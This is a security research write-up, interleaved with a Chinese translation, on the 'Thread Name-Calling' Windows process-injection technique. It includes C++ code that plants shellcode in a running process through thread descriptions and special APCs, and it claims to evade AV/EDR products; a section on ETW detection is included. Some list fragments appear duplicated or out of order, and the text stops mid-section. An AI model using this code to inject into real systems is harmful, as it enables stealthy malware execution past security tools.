Research by: hasherezade
研究者: hasherezade
Process injection is one of the important techniques used by attackers. We can find its variants implemented in almost every malware. It serves purposes such as:
进程注入是攻击者使用的重要技术之一。我们可以发现它的变体几乎在所有恶意软件中都实现了。它的作用包括:
Due to the fact that interference in the memory of a process by malicious modules can cause a lot of damage, all sorts of AV and EDR products monitor such behaviors and try to prevent them. However, this monitoring is based on the knowledge about the common APIs used in implementations of the injection methods. This cat-and-mouse game never ends. Cybercriminals, as well as red teamers, keep trying to break the known patterns, by using some atypical APIs, and thanks to this, to evade the detection implemented at the time. One example of this is the Atom Bombing technique (from 2016), which uses the Atom Table to pass the code into the remote process, or the recently introduced Pool Party (from 2023), where the thread pools were abused to run the code in the context of a different process, without the EDRs noticing it. The diversity of the APIs used has been very well described in the paper “Windows Process Injection in 2019” by Amit Klein and Itzik Kotler.
由于恶意模块对进程内存的干扰会造成很大的损害,因此各种 AV 和 EDR 产品都会监控此类行为并试图防止它们。但是,此监视基于有关注入方法实现中使用的常见 API 的知识。这场猫捉老鼠的游戏永无止境。网络犯罪分子以及红队成员不断试图通过使用一些非典型 API 来打破已知模式,因此,可以逃避当时实施的检测。这方面的一个例子是 Atom Bombing 技术(从 2016 年开始),它使用 Atom Table 将代码传递到远程进程,或者最近引入的 Pool Party(从 2023 年开始),其中线程池被滥用在不同进程的上下文中运行代码,而 EDR 没有注意到它。Amit Klein 和 Itzik Kotler 的论文“2019 年的 Windows 进程注入”中已经很好地描述了所用 API 的多样性。
Thread Name-Calling is yet another take on this topic. It is a technique allowing to implant a shellcode into a running process, using the following Windows APIs:
线程名称调用是此主题的另一种方式。这是一种允许使用以下 Windows API 将 shellcode 植入正在运行的进程中的技术:
GetThreadDescription
/ SetThreadDescription
(introduced in Windows 10, 1607) – an API for setting and retrieving the thread description (a.k.a. thread name)GetThreadDescription
/ SetThreadDescription
(在 Windows 10、1607 中引入)– 用于设置和检索线程描述(又名线程名称)的 APIZwQueueApcThreadEx2
(introduced in Windows 10, 19045) – a new API for Asynchronous Procedure Calls (APC)ZwQueueApcThreadEx2
(在 Windows 10、19045 中引入) – 用于异步过程调用 (APC) 的新 APIThe remote memory allocation, and writing to it, is achieved on the process using a handle without the write access (PROCESS_VM_WRITE
). Thanks to this feature, and also due to the fact that the APIs we used are not commonly associated with process injection, we were able to bypass some of the major AV and EDR products. In this blog we elaborate on the implementation details of this new technique and suggest some possible detection methods.
远程内存分配和写入它是使用没有写入访问权限 (PROCESS_VM_WRITE
) 的句柄在进程上实现的。多亏了这个功能,也因为我们使用的 API 通常与进程注入无关,我们能够绕过一些主要的 AV 和 EDR 产品。在这篇博客中,我们详细阐述了这项新技术的实现细节,并提出了一些可能的检测方法。
Before we begin, note that the involved functions are relatively new, and are not used in any well-established injection methods. However, they are not “brand new” – they have been added a few years ago, so naturally we are not the first ones to research about their potential for offensive scenarios. Some of the related uses were discussed on X/Twitter (we found a question by Adam “Hexacorn” from 2020, and by Gal Yaniv from 2021 referencing those APIs). We tried to collect the various use-cases to the best of our abilities, and list the related PoCs.
在开始之前,请注意所涉及的函数相对较新,并且未在任何成熟的注入方法中使用。然而,它们并不是“全新的”——它们是几年前添加的,所以自然我们不是第一个研究它们在进攻场景中的潜力的人。在 X/Twitter 上讨论了一些相关用途(我们发现了 Adam “Hexacorn” 在 2020 年和 2021 年提出的一个问题,其中提到了这些 API)。我们试图尽我们所能收集各种用例,并列出相关的 PoC。
Get/SetThreadDescription may be utilized in:
Get/SetThreadDescription 可用于:
GetThreadDescription
is called remotely on the target, via APC, causing the description buffer to be copied into the target’s working set. After making the buffer executable, it is run using another APC call. It supports any custom shellcode. This technique does not corrupt the original thread: the target application seamlessly continues its execution.GetThreadDescription
,从而将描述缓冲区复制到目标的工作集中。使缓冲区可执行后,使用另一个 APC 调用运行它。它支持任何自定义 shellcode。此技术不会损坏原始线程:目标应用程序无缝地继续执行。LoadLibrary
to get the DLL loaded within the target. In contrast to the classic implementation that uses VirtualAllocEx
and WriteProcessMemory
, here the path of the DLL is passed via thread name (remote write achieved as in the Thread Name-Calling).
Lets start by looking at the APIs that are vital for the introduced technique. Understanding the details of their implementation is crucial for explaining the further abuse.
Since Windows 10, 1607 the following functions were added to the Windows API:
HRESULT GetThreadDescription( [in] HANDLE hThread, [out] PWSTR *ppszThreadDescription );
HRESULT SetThreadDescription( [in] HANDLE hThread, [in] PCWSTR lpThreadDescription );
Their expected usage is related to setting the description (name) of a thread. That enables us to identify its functionality, and can help i.e. in debugging. However, if we look at this API with an offensive mindset, we can quickly see some potential for misuse.
它们的预期用法与设置线程的描述 (name) 有关。这使我们能够识别其功能,并可以帮助进行调试。但是,如果我们以冒犯性的心态看待这个 API,我们很快就会看到一些潜在的滥用。
To set the name, we need to open a handle to the thread with the access flag THREAD_SET_LIMITED_INFORMATION
. Under this minimal requirement, we can attach our arbitrary buffer to any thread of a remote process.
要设置名称,我们需要打开线程的句柄 访问标志 THREAD_SET_LIMITED_INFORMATION
.在这个最低要求下,我们可以将任意缓冲区附加到远程进程的任何线程。
The buffer must be a Unicode string, which basically means, any buffer terminated by a L'\0'
(double NULL byte). The size that we can allocate is pretty generous: 0x10000
bytes – of which, according to experiments, we can use (0x10000 - 2)
for our data buffer (including the terminator). This is an equivalent of almost 16 pages of data, which is well enough to store a block of shellcode…
缓冲区必须是 Unicode 字符串,这基本上意味着任何以 L'\0'
(双 NULL 字节)结尾的缓冲区。我们可以分配的大小非常大:0x10000
字节 – 根据实验,我们可以将 (0x10000 - 2)
用于我们的数据缓冲区(包括终止符)。这相当于将近 16 页的数据,足以存储一段 shellcode......
The described functions are implemented in Kernelbase.dll
.
所描述的函数以 Kernelbase.dll
实现。
#define ThreadNameInformation 0x26 HRESULT __stdcall SetThreadDescription(HANDLE hThread, PCWSTR lpThreadDescription) { NTSTATUS status; // eax struct _UNICODE_STRING DestinationString; status = RtlInitUnicodeStringEx(&DestinationString, lpThreadDescription); if ( status >= 0 ) status = NtSetInformationThread(hThread, ThreadNameInformation, &DestinationString, 0x10u); return status | 0x10000000; }
This function expects us to pass a Unicode string buffer (WCHAR*
), from which it creates a UNICODE_STRING structure, that is passed further. Looking at the implementation, we can see that the setting of the string onto the thread is implemented by NtSetInformationThread
. The returned value is a result of the aforementioned low-level API converted from NTSTATUS to HRESULT, by setting FACILITY_NT_BIT
( 0x10000000
).
此函数要求我们传递一个 Unicode 字符串缓冲区 (WCHAR*
),从该缓冲区创建一个 UNICODE_STRING 结构,该结构将进一步传递。查看实现,我们可以看到线程上的字符串设置是由 NtSetInformationThread
实现的。返回的值是上述低级 API 通过设置 FACILITY_NT_BIT
( 0x10000000 ) 从 NTSTATUS 转换为 HRESULT 的结果。
In our implementation of a remote write, we start by calling SetThreadDescription
on a remote thread, making it hold our buffer.
在远程写入的实现中,我们首先在远程线程上调用 SetThreadDescription
,使其保存我们的缓冲区。
HRESULT __stdcall GetThreadDescription(HANDLE hThread, PWSTR *ppszThreadDescription) { SIZE_T struct_len; // rbx SIZE_T struct_size; // r8 NTSTATUS res; // eax NTSTATUS status; // ebx const UNICODE_STRING *struct_buf; // rdi ULONG ReturnLength; // [rsp+58h] [rbp+10h] BYREF *ppszThreadDescription = nullptr; LODWORD(struct_len) = 144; RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, 0); for ( struct_size = 146; ; struct_size = struct_len + 2 ) { struct_buf = (const UNICODE_STRING *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, struct_size); if ( !struct_buf ) { status = 0xC0000017; goto finish; } res = NtQueryInformationThread( hThread, ThreadNameInformation, (PVOID)struct_buf, struct_len, &ReturnLength); status = res; if ( res != 0xC0000004 && res != 0xC0000023 && res != 0x80000005 ) break; struct_len = ReturnLength; RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, (PVOID)struct_buf); } if ( res >= 0 ) { ReturnLength = struct_buf->Length; // move the buffer to the beginning of the structure memmove_0((void *)struct_buf, struct_buf->Buffer, ReturnLength); // null terminate the buffer *(&struct_buf->Length + ((unsigned __int64)ReturnLength >> 1)) = 0; // fill in the passed pointer *ppszThreadDescription = &struct_buf->Length; struct_buf = 0i64; } finish: RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, (PVOID)struct_buf); return status | 0x10000000; }
Analyzing this function reveals some other interesting implementation details. The buffer for the thread name that we want to retrieve is allocated on a heap within the retrieving process. The function automatically allocates a size that can fit the relevant UNICODE_STRING. It then erases the initial fields of the structure (Length
and MaximumLength
), and moves the buffer content towards the beginning of the structure, transforming it into a simple, null-terminated wide string. Next, the pointer to this new buffer is filled into the variable passed by the caller.
分析此函数可揭示其他一些有趣的实现细节。我们要检索的线程名称的缓冲区是在检索进程中的堆上分配的。该函数会自动分配适合相关UNICODE_STRING的大小。然后,它会擦除结构的初始字段 (Length
和 MaximumLength
) ,并将缓冲区内容移动到结构的开头,将其转换为简单的以 null 结尾的宽字符串。接下来,指向此新缓冲区的指针将填充到调用方传递的变量中。
If we call GetThreadDescription
remotely, in the context of the target process, we gain a remote allocation of a buffer on the heap, plus, getting it filled with our content.
如果我们远程调用 GetThreadDescription
,则在目标进程的上下文中,我们可以在堆上远程分配缓冲区,此外,还可以用我们的内容填充它。
Looking at the implementation, we can notice that a buffer that we retrieve via GetThreadDescription
is just a local copy. Now the question is: where is the original UNICODE_STRING, associated with the thread, stored? To learn more we need to look into the Windows kernel (ntoskrnl.exe
), at the implementation of the syscalls that set /read it ( NtSetInformationThread
and NtQueryInformationThread
).
It turns out this buffer is stored in the Kernel Mode, represented by the field in ETHREAD
→ ThreadName
.
lkd> dt nt!_ETHREAD [...] +0x610 ThreadName : Ptr64 _UNICODE_STRING [...]
Fragment of NtSetInformationThread
responsible for setting the thread name (in Kernel Mode):
[...] Length = Src.Length; if ( (Src.Length & 1) != 0 || Src.Length > Src.MaximumLength ) { status = 0xC000000D; // STATUS_INVALID_PARAMETER -> invalid buffer size supplied } else { PoolWithTag = ExAllocatePoolWithTag(NonPagedPoolNx, Src.Length + 16i64, 'mNhT'); // allocating a buffer on non paged pool, with tag 'ThNm' threadName = PoolWithTag; v113 = PoolWithTag; if ( PoolWithTag ) { p_Length = &PoolWithTag[1].Length; threadName->Buffer = p_Length; threadName->Length = Length; threadName->MaximumLength = Length; memmove(p_Length, Src.Buffer, Length); eThread = Object; PspLockThreadSecurityExclusive(Object, CurrentThread); v105 = 1; P = eThread->ThreadName; eThread->ThreadName = threadName; threadName = 0i64; v113 = 0i64; EtwTraceThreadSetName(eThread); goto finish; } status = 0xC000009A; } } else { status = 0xC0000004; } v104 = status; finish: [...]
As we can see, the buffer is allocated on NonPagedPoolNx
(non-executable non-paged pool). The allocated buffer is filled with the UNICODE_STRING
, and its pointer is stored in ThreadName
within the ETHREAD
structure of a particular thread.
正如我们所看到的,缓冲区是在 NonPagedPoolNx
(不可执行的非分页池)上分配的。分配的缓冲区填充了 UNICODE_STRING
,其指针存储在特定线程的 ETHREAD
结构内的 ThreadName
中。
The event of setting the ThreadName
is registered by ETW (Event Tracing for Windows), which can be further used to detect this injection method. The generated event collects data such as ProcessID and ThreadID, which are required to identify the thread and the ThreadName that was set.
设置 ThreadName
的事件由 ETW (Event Tracing for Windows) 注册,ETW 可以进一步用于检测此注入方法。生成的事件收集 ProcessID 和 ThreadID 等数据,这些数据是标识线程和设置的 ThreadName 所必需的。
__int64 __fastcall EtwTraceThreadSetName(_ETHREAD *thread) { int v1; // r10d _UNICODE_STRING *ThreadName; // rax __int64 *Buffer; // rcx unsigned int Length; // edx unsigned __int64 len; // rax int v7[4]; // [rsp+30h] [rbp-50h] BYREF __int64 v8[2]; // [rsp+40h] [rbp-40h] BYREF __int64 *buf; // [rsp+50h] [rbp-30h] __int64 v10; // [rsp+58h] [rbp-28h] __int64 *v11; // [rsp+60h] [rbp-20h] __int64 v12; // [rsp+68h] [rbp-18h] v7[0] = thread->Cid.UniqueProcess; v1 = 2; v7[1] = thread->Cid.UniqueThread; v8[0] = v7; ThreadName = thread->ThreadName; v7[2] = 0; v8[1] = 8i64; if ( ThreadName && (Buffer = ThreadName->Buffer) != 0i64 ) { Length = ThreadName->Length; len = 0x800i64; if ( Length < 0x800u ) len = Length; buf = Buffer; v10 = len; if ( !len || *(Buffer + (len >> 1) - 1) ) { v12 = 2i64; v11 = &EtwpNull; v1 = 3; } } else { v10 = 2i64; buf = &EtwpNull; } return EtwTraceKernelEvent(v8, v1, 2, 1352, 0x501802); }
Setting the thread name by the official API imposes some limitations on the buffer. It has to be a valid Unicode string, that means, an empty WCHAR will be used as a buffer terminator. The size of WCHAR is two bytes – so if our shellcode has any double NULL byte inside only the part before it will be copied. This is a common limitation encountered whenever the shellcode is to be passed via buffer dedicated to hold strings. To solve this issue, shellcode encoders have been invented: they allow to convert a buffer into a format that is free from NULL bytes. We can use one of them in our case as well.
However, by analyzing the implementation of the above API, we realized that it is actually possible to avoid this limitation at its root. When the Thread Name is copied between different buffers, the declared length from the UNICODE_STRING
structure is used, along with memmove
function, which does not treat NULL bytes as terminators. The only function that imposes the NULL byte constraint is SetThreadDescription
. Underneath, it calls RtlInitUnicodeStringEx
that takes the passed WCHAR buffer, and uses it to initializes the UNICODE_STRING structure. The input buffer must be NULL terminated, and the length to be saved in the structure is determined basing on the position of this character.
We can create an easy workaround for our problem, by using a custom implementation of SetThreadDescription:
HRESULT mySetThreadDescription(HANDLE hThread, const BYTE* buf, size_t buf_size) { UNICODE_STRING DestinationString = { 0 }; BYTE* padding = (BYTE*)::calloc(buf_size + sizeof(WCHAR), 1); ::memset(padding, 'A', buf_size); auto pRtlInitUnicodeStringEx = reinterpret_cast<decltype(&RtlInitUnicodeStringEx)>(GetProcAddress(GetModuleHandle("ntdll.dll"), "RtlInitUnicodeStringEx")); pRtlInitUnicodeStringEx(&DestinationString, (PCWSTR)padding); // fill with our real content: ::memcpy(DestinationString.Buffer, buf, buf_size); auto pNtSetInformationThread = reinterpret_cast<decltype(&NtSetInformationThread)>(GetProcAddress(GetModuleHandle("ntdll.dll"), "NtSetInformationThread")); NTSTATUS status = pNtSetInformationThread(hThread, (THREADINFOCLASS)(ThreadNameInformation), &DestinationString, 0x10u); ::free(padding); return HRESULT_FROM_NT(status); }
This function initializes UNICODE_STRING basing on a dummy buffer of a required length, and then fills it with the actual content (which may contain NULL bytes). Then, the prepared structure is passed to the thread using the low-level API: NtSetInformationThread
.
In the implementation of our injection technique, we rely on calling some APIs remotely within the target process.
Windows supports adding routines to Asynchronous Procedure Call (APC) queue of existing threads, giving the ability to run code in a remote process without the need to create an additional thread. At a low level, this functionality is exposed by the function: NtQueueApcThreadEx
(and its wrapper:NtQueueApcThread
). The official, higher-level API recommended by Microsoft is QueueUserAPC
– which works as a wrapper for the lower-level function. We are free to add APC to a remote thread, as long as its handle is opened with THREAD_SET_CONTEXT
access.
The related APIs have often been misused in variety of different (old and new) injection techniques, and are described in the MITRE database. APC allows for running remote code by hopping onboard an existing thread, and that is stealthier than the common alternative of creating a remote thread. Creating a new thread triggers a kernel callback (PsSetCreateThreadNotifyRoutine
/ Ex
), often used by kernel-mode components of AV / EDR products for detection.
In addition, APC gives us more freedom in passing parameters to the remote function. In case of a new thread creation, we can pass only one argument – and here we are allowed to use 3.
However, using the plain NtQueueApcThread has a drawback. To add our function to the APC queue, we need to first find the thread that is in an alertable state (waiting for a signal). Our callback is executed only when the thread is alerted. Details on how to approach this obstacle are explained i.e. in the blog post by modexp. Relying on alertable threads limits our choices for the targets, and scanning for them adds some complexity to the injector.
Fortunately, a workaround to this problem appeared since the new types of APC callbacks have been introduced on Windows. They are defined by QUEUE_USER_APC_FLAGS
. Since the introduction of this type, the argument ReserveHandle
in NtQueueApcThreadEx
was replaced with UserApcOption
where we can pass such a flag, modifying the function’s behavior. The most interesting from our perspective is Special User APC ( QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC
) that allows us to inject into threads that are not necessarily in the alertable state:
Quote from MSDN:
Special user-mode APCs always execute, even if the target thread is not in an alertable state. For example, if the target thread is currently executing user-mode code, or if the target thread is currently performing an alertable wait, the target thread will be interrupted immediately for APC execution. If the target thread is executing a system call, or performing a non-alertable wait, the APC will be executed after the system call or non-alertable wait finishes (the wait is not interrupted).
Note that the potential of the new API for improving injection methods, was already noticed by researchers, and is described, i. e. in this blog by repnz.
This new APC type has also been criticized for the associated risk of introducing stability issues in the application and making it harder to synchronize the threads (i.e. here). However, it should not be a big problem in our case, as we are using it to run a code that is completely independent from the running application and does not use any resources that should create concurrency issues.
The new API supporting the added APC types was officially added in Windows 11 (Build 22000). It is exposed by the function: QueueUserAPC2
, which, at the lower level, was implemented by a new version of the well-known NtQueueApcThreadEx
. The new function is simply called NtQueueApcThreadEx2
and has the following prototype (source):
NTSYSCALLAPI NTSTATUS NTAPI NtQueueApcThreadEx2( _In_ HANDLE ThreadHandle, _In_opt_ HANDLE ReserveHandle, // NtAllocateReserveObject _In_ ULONG ApcFlags, // QUEUE_USER_APC_FLAGS _In_ PPS_APC_ROUTINE ApcRoutine, _In_opt_ PVOID ApcArgument1, _In_opt_ PVOID ApcArgument2, _In_opt_ PVOID ApcArgument3 );
It turns out, we can find this API on Windows 10, since build 19045
– which is earlier than the officially supported version.
As this is a relatively new API, associated with a new syscall, using it can also give an opportunity to bypass some of the products that are not yet watching it.
We use this API for a remote function execution in our implementation of Thread Name-Calling. Still, it is possible to implement a (less stealthy) variant of Thread Name-Calling, using the old API, which we will also demonstrate.
This function is not a requirement for our technique, but rather a helper that makes the shellcode execution a bit more stealthy.
Once the shellcode is successfully copied into the remote process, we need to run it. We decided to do it by adding its start address to the APC queue of the remote thread. However, since our shellcode is in a private memory rather than in any mapped module, passing its address directly may trigger some alerts. To evade this indicator it is beneficial to use some legitimate function as a proxy. There are multiple functions that allow to pass a callback to be executed. Many of them have been documented extensively by Hexacorn in his blog. Some interesting additions have been noted by modexp blog.
一旦 shellcode 成功复制到远程进程中,我们需要运行它。我们决定通过将其起始地址添加到远程线程的 APC 队列来实现。但是,由于我们的 shellcode 位于私有内存中,而不是在任何映射模块中,因此直接传递其地址可能会触发一些警报。为了规避这个指标,使用一些合法的函数作为代理是有益的。有多个函数允许传递要执行的回调。其中许多已被 Hexacorn 在他的博客中广泛记录。modexp 博客注意到 了一些有趣的补充。
The function RtlDispatchAPC
looks like a perfect candidate. It has three arguments, so it is compatible with APC API. The implementation:
函数 RtlDispatchAPC
看起来是一个完美的候选项。它有三个参数,因此与 APC API 兼容。实现:
void __fastcall RtlDispatchAPC(void (__fastcall *callback)(__int64), __int64 callback_arg, void *a3) { __int64 v6 = 72LL; int v7 = 1; __int128 v8 = 0LL; __int128 v9 = 0LL; __int128 v10 = 0LL; __int64 v11 = 0LL; if ( a3 == (void *)-1LL ) { callback(callback_arg); } else { RtlActivateActivationContextUnsafeFast(&v6, a3); callback(callback_arg); RtlDeactivateActivationContextUnsafeFast(&v6); RtlReleaseActivationContext(a3); } }
To make the above function execute our shellcode we need to pass it the following parameters:
RtlDispatchAPC(shellcodePtr, 0, (void *)(-1))
Note that RtlDispatchAPC
is not exported by name, but, on the tested versions of Windows, we could find it easily by Ordinal 8.
请注意,RtlDispatchAPC
不是按名称导出的,但是,在经过测试的 Windows 版本上,我们可以通过 Ordinal 8 轻松找到它。
Now that we have introduced all the important APIs, let’s dive into the implementation details of Thread Name-Calling. As already mentioned, it is a variant of a technique that allows us to inject a shellcode into a running process (in contrast to the techniques that operate on the process that needs to be freshly created).
现在我们已经介绍了所有重要的 API,让我们深入了解 Thread Name-Call 的实现细节。如前所述,它是一种技术的变体,它允许我们将 shellcode 注入到正在运行的进程中(与对需要新创建的进程进行操作的技术相反)。
Typically, when we want to write a buffer into a process, we need to first open a handle to this process with a write access right (PROCESS_VM_WRITE
) – which may be treated as a suspicious indicator. Thread Name-Calling allows us to achieve the write, and remote allocation, without it.
The currently presented implementation requires opening the process handle with the following access rights:
HANDLE open_process(DWORD processId, bool isCreateThread) { DWORD access = PROCESS_QUERY_LIMITED_INFORMATION // required for reading the PEB address | PROCESS_VM_READ // required for reading back the pointer to the created buffer | PROCESS_VM_OPERATION // to set memory area executable or/and allocate a new executable memory ; if (isCreateThread) { access |= PROCESS_CREATE_THREAD; // to create a new thread where we can pass APC } return OpenProcess(access, FALSE, processId); }
Depending on our needs, Thread Name-Calling can be implemented in different flavors. In the most stealthy (recommended) variant, we do the remote calls using routines added to the APC queue of an existing thread. However, if we want to run it on older versions of Windows, where the new API for APC is not available, and we can’t find alertable threads in our desired target, we may create an additional thread. In such case, the relevant access right needs to be set on our process handle:
根据我们的需要,线程名称调用可以用不同的风格实现。在最隐蔽(推荐)的变体中,我们使用添加到现有线程的 APC 队列中的例程进行远程调用。但是,如果我们想在旧版本的 Windows 上运行它,而 APC 的新 API 不可用,并且我们在所需的目标中找不到可警报的线程,我们可能会创建一个额外的线程。在这种情况下,需要在我们的流程句柄上设置相关访问权限:
PROCESS_CREATE_THREAD
Keep in mind that this change increases the detection ratio of the technique. However, we found some products where it was enough for the bypass.
请记住,此更改会增加技术的检测率。但是,我们发现一些产品足以绕过。
Generally, it is a good practice to minimize the used access rights. Of the ones listed above, we can still avoid using some of them by further refining the implementation. For example:
通常,最好尽量减少使用的访问权限。在上面列出的那些中,我们仍然可以通过进一步完善实现来避免使用其中的一些。例如:
PROCESS_QUERY_LIMITED_INFORMATION
– can be avoided if we don’t use PEB for the pointer storage (details explained later)PROCESS_QUERY_LIMITED_INFORMATION
——如果我们不使用 PEB 作为指针存储,则可以避免(细节将在后面解释)During the injection, we operate on threads of our target process. Regarding the thread handle, these are the minimal required access rights:
在注入期间,我们对目标进程的线程进行操作。关于线程句柄,以下是所需的最低访问权限:
DWORD thAccess = SYNCHRONIZE; thAccess |= THREAD_SET_CONTEXT; // required for adding to the APC queue thAccess |= THREAD_SET_LIMITED_INFORMATION; // required for setting thread description
As is always the case of with remote shellcode injection, the implementation must cover:
与远程 shellcode 注入一样,实现必须涵盖:
Let’s have a look at the details of how the remote allocation, along with remote writing, can be implemented with the help of the APIs mentioned earlier.
HRESULT GetThreadDescription( [in] HANDLE hThread, [out] PWSTR *ppszThreadDescription // <- we get back the pointer to allocated buffer );
Remember that the above function automatically allocates a buffer of a required size on the heap, and then fills it in with the thread description. This gives us the remote write primitive together with remote allocation of a buffer with Read/Write access. The pointer to this new buffer will be filled into the supplied variable ppszThreadDescription
.
Therefore, we need to prepare in advance a memory address within the remote process that can be used as *ppszThreadDescription
. It must be an area of a pointer size where the called function GetThreadDescription
can write back. There are various options to approach it:
We decided to utilize an unused field in a PEB because it is very easy to find and retrieve, but we can later replace it with a cave if needed.
By checking fields in the PEB we can find the following:
[...] PVOID SparePointers[2]; // 19H1 (previously FlsCallback to FlsHighIndex) PVOID PatchLoaderData; PVOID ChpeV2ProcessInfo; // _CHPEV2_PROCESS_INFO ULONG AppModelFeatureState; ULONG SpareUlongs[2]; // ---> unused field, can be utilized to store our pointer USHORT ActiveCodePage; USHORT OemCodePage; USHORT UseCaseMapping; USHORT UnusedNlsField; PVOID WerRegistrationData; PVOID WerShipAssertPtr; union { PVOID pContextData; // WIN7 PVOID pUnused; // WIN10 PVOID EcCodeBitMap; // WIN11 }; [...]
The field SpareUlongs
looks like a good candidate. We can retrieve its exact offset by dumping the PEB with WinDbg:
lkd> dt nt!_PEB [...] +0x340 SpareUlongs : [5] Uint4B [...]
PEB has read/write access, so by finding an unused field of a pointer size, we have the suitable storage where the remotely called function can write back. Keep in mind, that in the future versions of Windows, those fields may be utilized for some system data structures, so this solution must be adjusted accordingly to the updates.
PEB 具有读/写访问权限,因此通过查找指针大小的未使用字段,我们获得了合适的存储空间,远程调用的函数可以在其中回写。请记住,在未来版本的 Windows 中,这些字段可能用于某些系统数据结构,因此必须根据更新相应地调整此解决方案。
First, we retrieve the address of the remote PEB – we can do it by calling the API NtQuerySystemInformationProcess
:
// the function getting the remote PEB address: ULONG_PTR remote_peb_addr(IN HANDLE hProcess) { PROCESS_BASIC_INFORMATION pi = { 0 }; DWORD ReturnLength = 0; auto pNtQueryInformationProcess = reinterpret_cast<decltype(&NtQueryInformationProcess)>(GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryInformationProcess")); if (!pNtQueryInformationProcess) { return NULL; } NTSTATUS status = pNtQueryInformationProcess( hProcess, ProcessBasicInformation, &pi, sizeof(PROCESS_BASIC_INFORMATION), &ReturnLength ); if (status != STATUS_SUCCESS) { std::cerr << "NtQueryInformationProcess failed" << std::endl; return NULL; } return (ULONG_PTR)pi.PebBaseAddress; }
Having the base address of the PEB, it is enough to add the known offset of the unused field, to get its pointer in the context of the remote process:
ULONG_PTR get_peb_unused(HANDLE hProcess) { ULONG_PTR peb_addr = remote_peb_addr(hProcess); if (!peb_addr) { std::cerr << "Cannot retrieve PEB address!\n"; return NULL; } const ULONG_PTR UNUSED_OFFSET = 0x340; const ULONG_PTR remotePtr = peb_addr + UNUSED_OFFSET; return remotePtr; }
As for setting the thread description (a. k. a. name) – we can do it either:
The name will be retrieved by passing an APC with the function GetThreadDescription
to the same thread where it was set (since this function has 2 parameters, and calling via APC we can pass up to 3 parameters, it is a good fit).
Side note: 旁注:
The function
GetThreadDescription
requires us to pass the handle to the thread which description (name) we want to read. We CAN set the name on a different thread than the one reading it back. But keep in mind that this function will be executed in context of the target process. Therefore, the handle to the thread that we opened in context of the injector process is no longer valid. Using it in context of a different process would require us to duplicate the handle of the named thread. That means, we must extend our access to the target process by settingPROCESS_DUP_HANDLE
, so it’s best to avoid it. The alternative scenario is much easier: because we retrieve the name by the named thread itself, it is enough to use the pseudo handleNtCurrentThread()
= (-2) , which is always valid while referencing to the current thread by self.
In the first (preferable) scenario, if we utilize the threads already running within the process, we should either:
在第一种(更可取的)场景中,如果我们利用进程中已经运行的线程,我们应该:
QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC
)QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC
The thread must be open with (at least) THREAD_SET_CONTEXT | THREAD_SET_LIMITED_INFORMATION
access.
In the second scenario, with a newly created thread, if we use it in conjunction with the old API, we also have to ensure that the thread is alertable, so that our APC gets executed. Examples on how to do it:
Sleep
, ExitThread
from kernel32), add the needed function to the APC queue, then resume itSleep
、ExitThread
),将所需的函数添加到 APC 队列中,然后恢复它SleepEx
function. This function requires two arguments, the second one defining if the Sleep is alertable. Using the thread creation function we can pass only one argument – this sounds like a problem. Yet, the second needed argument is boolean, which means, any non-zero value is treated as TRUE. In the x64 calling convention the second argument is passed via RDX register, so if the RDX register, at the point of calling, holds anything different than zero, our SleepEx
will be treated as alertable. That means, with a high probability the needed value is already set.SleepEx
函数上创建线程。此函数需要两个参数,第二个参数定义 Sleep 是否可警报。使用线程创建函数,我们只能传递一个参数 – 这听起来像个问题。但是,第二个需要的参数是 boolean,这意味着任何非零值都被视为 TRUE。在 x64 调用约定中,第二个参数是通过 RDX 寄存器传递的,因此,如果 RDX 寄存器在调用时包含除零以外的任何内容,则我们的 SleepEx
将被视为可警报。这意味着,很有可能已经设置了所需的值。Any other steps can be done only after our APC gets called. Before that, we don’t have our buffer in the remote process yet, and we also don’t know at what address it would be stored. Therefore, in order to pass the buffer, we need the first APC. And after it is completed and the buffer is written, we need the second APC to be able to run it.
任何其他步骤只有在我们的 APC 被调用后才能完成。在此之前,我们还没有在远程进程中拥有缓冲区,我们也不知道它会存储在哪个地址。因此,为了传递缓冲区,我们需要第一个 APC。在它完成并写入缓冲区后,我们需要第二个 APC 才能运行它。
wchar_t* pass_via_thread_name(HANDLE hProcess, const wchar_t* buf, const void* remotePtr) { if (!remotePtr) { std::cerr << "Return pointer not set!\n"; return nullptr; } HANDLE hThread = find_thread(hProcess, THREAD_SET_CONTEXT | THREAD_SET_LIMITED_INFORMATION); if (!hThread || hThread == INVALID_HANDLE_VALUE) { std::cerr << "Invalid thread handle!\n"; return nullptr; } HRESULT hr = mySetThreadDescription(hThread, buf); // customized SetThreadDescription allows to pass a buffer with NULL bytes if (FAILED(hr)) { std::cout << "Failed to set thread desc" << std::endl; return nullptr; } if (!queue_apc_thread(hThread, GetThreadDescription, (void*)NtCurrentThread(), (void*)remotePtr, 0)) { CloseHandle(hThread); return nullptr; } // close thread handle CloseHandle(hThread); wchar_t* wPtr = nullptr; bool isRead = false; while ((wPtr = (wchar_t*)read_remote_ptr(hProcess, remotePtr, isRead)) == nullptr) { if (!isRead) return nullptr; Sleep(1000); // waiting for the pointer to be written; } std::cout << "Written to the Thread\n"; return wPtr; }
After the above function finishes, we have our buffer written to the remote process. We also have a pointer to it. That means, the remote write is accomplished.
上述函数完成后,我们将缓冲区写入远程进程。我们还有一个指向它的指针。这意味着,远程写入已完成。
At this point our payload is already stored in the working set of the remote process. However, it is in a non-executable memory, allocated on the heap.
此时,我们的 payload 已经存储在远程进程的工作集中。但是,它位于分配在堆上的不可执行内存中。
To proceed, we need to do one of these:
要继续,我们需要执行以下操作之一:
Copying our buffer from the heap into a different memory region can be achieved via APC, by calling the function RtlMoveMemory
from ntdll
, which has 3 arguments. However, obtaining the executable buffer is more problematic.
可以通过 APC 将缓冲区从堆复制到不同的内存区域,方法是从 ntdll
调用函数 RtlMoveMemory
,该函数有 3 个参数。但是,获取可执行缓冲区的问题更大。
None of the proposed solutions is perfect, but they may be sufficient depending on the scenario.
提出的解决方案都不是完美的,但根据情况,它们可能就足够了。
Allocating a new buffer is the cleanest option, but it has some drawbacks. To do it from a remote process, we must call VirtualAllocEx
with RWX access – which is suspicious. Calling VirtualAlloc
remotely via APC is impossible: this function has 4 arguments, and with the API for APC we can only pass 3.
